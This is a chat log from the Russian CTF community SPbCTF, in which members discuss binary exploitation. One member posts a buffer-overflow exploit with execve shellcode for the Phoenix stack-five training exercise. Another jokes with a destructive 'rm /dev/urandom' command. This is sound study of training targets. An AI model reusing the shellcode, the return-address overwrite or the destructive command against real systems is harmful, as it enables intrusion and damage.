Size: a a a

2021 April 05

MD

Mls Dmitry in SPbCTF
я не уверен на счет этой конкретной задачи, но да реально. libc_start_main
источник

MD

Mls Dmitry in SPbCTF
и там другие функи иногда лежат
источник

L

Lex in SPbCTF
так по адресу лежит код же
источник

L

Lex in SPbCTF
а мне нужно, чтобы по адресу лежал адрес)
источник

MD

Mls Dmitry in SPbCTF
а положить адрес, который ссылается на libc функу со стека  можно?
источник

L

Lex in SPbCTF
хз, буду думать)
источник

MD

Mls Dmitry in SPbCTF
если у тебя есть контроль над стеком, это вполне возможно
источник

VR

Vlad Roskov in SPbCTF
ну так пропатчь argv[0] чтоб он указывал не на строчку, а на место где libc_start_main_ret
источник

r

robinak in SPbCTF
как уменьшить пул энтропии /dev/urandom ?
источник

VR

Vlad Roskov in SPbCTF
rm /dev/urandom ; echo LOL > /dev/urandom
источник

T

Tmp00 in SPbCTF
В /proc/sys/kernel/random/poolsize?
источник

r

robinak in SPbCTF
aga
источник

r

robinak in SPbCTF
вернее в /proc/sys/kernel/random/entropy_avail
источник

T

Tmp00 in SPbCTF
Неа
источник

T

Tmp00 in SPbCTF
Этот файлик вообще ро должен быть, вроде
источник

T

Tmp00 in SPbCTF
Там показывается насколько заполнен пул
источник
2021 April 06

OL

Oleg Lylok in SPbCTF
Всем привет, возникла проблема с заданием https://exploit.education/phoenix/stack-five/ . Заполняю буфер nop'ами, потом за ними шеллкод, далее дозаполняю мусором буфер, перезаписываю rbp мусором, а rip перезаписываю на начало буфера. Делал \xcc перед шеллом- в gdb trace/breakpoint trap, инструкции шелла выполняются, но на push rsp - segmentation fault. шеллкод - http://shell-storm.org/shellcode/files/shellcode-806.php. при запуске через $(python exploit.py; cat) | путь до исполняемого файла - ничего не пишет, даже trace/breakpoint trap. код сплоита:  from pwn import *
buff = ""
buff += '\x90'*30
buff += '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
buff += 'A'* (128 - len(buff))  
buff += 'BBBBBBBB'  
buff += p64(0x7fffffffebe0)  
print(buff)
источник

L

Lex in SPbCTF
почему g-recaptcha может исчезать, когда рядом появляется объект iframe?
источник

L

Lex in SPbCTF
то есть без iframe на этом же сайте норм, как только добавляю - не появляется
источник

A

Anime Boy in SPbCTF
куда он ведет
источник